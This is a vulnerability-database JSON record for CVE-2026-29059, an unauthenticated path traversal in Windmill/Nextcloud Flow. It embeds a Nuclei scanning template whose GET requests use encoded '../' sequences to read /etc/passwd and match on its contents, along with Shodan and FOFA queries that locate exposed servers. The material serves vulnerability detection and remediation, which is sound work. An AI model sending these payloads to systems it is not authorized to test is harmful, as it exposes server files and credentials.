{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-29059/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-29059/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-29059/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-29059/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-29059/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-29059"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-29059"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.02945,
      "kev": false,
      "percentile": 0.8655
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2026/CVE-2026-29059.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2026-29059\n\ninfo:\n  name: Windmill/Nextcloud Flow < 1.603.3 - Unauthenticated Path Traversal\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Windmill < 1.603.3 contains a path traversal caused by unsanitized filename parameter in get_log_file endpoint, letting unauthenticated attackers read arbitrary files on the server, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.\n  remediation: |\n    Update to version 1.603.3 or later.\n  reference:\n    - https://github.com/Chocapikk/Windfall\n    - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29059\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-29059\n    epss-score: 0.02945\n    epss-percentile: 0.8655\n    cwe-id: CWE-22\n  metadata:\n    max-request: 4\n    vendor: windmill\n    product: windmill\n    verified: true\n    shodan-query: http.html:\"Windmill\" http.html:\"svelte-global-loader\"\n    fofa-query: app=\"Windmill\"\n  tags: cve,cve2026,windmill,nextcloud,lfi,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n      - \"{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n      - \"{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd\"\n      - \"{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"root:x:0:0:\"\n\n      - type: word\n        part: body\n        words:\n          - \"<!DOCTYPE\"\n          - \"Err:\"\n        condition: or\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220496f3828615dee2006f011488144abbc9c9a273ac8023a995079cd77b1592bde022100a439390faf2fd1c912fffc7ecdb08f9c3c6e03cee9bbe3483ef64ca64129d215:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2026-29059"
}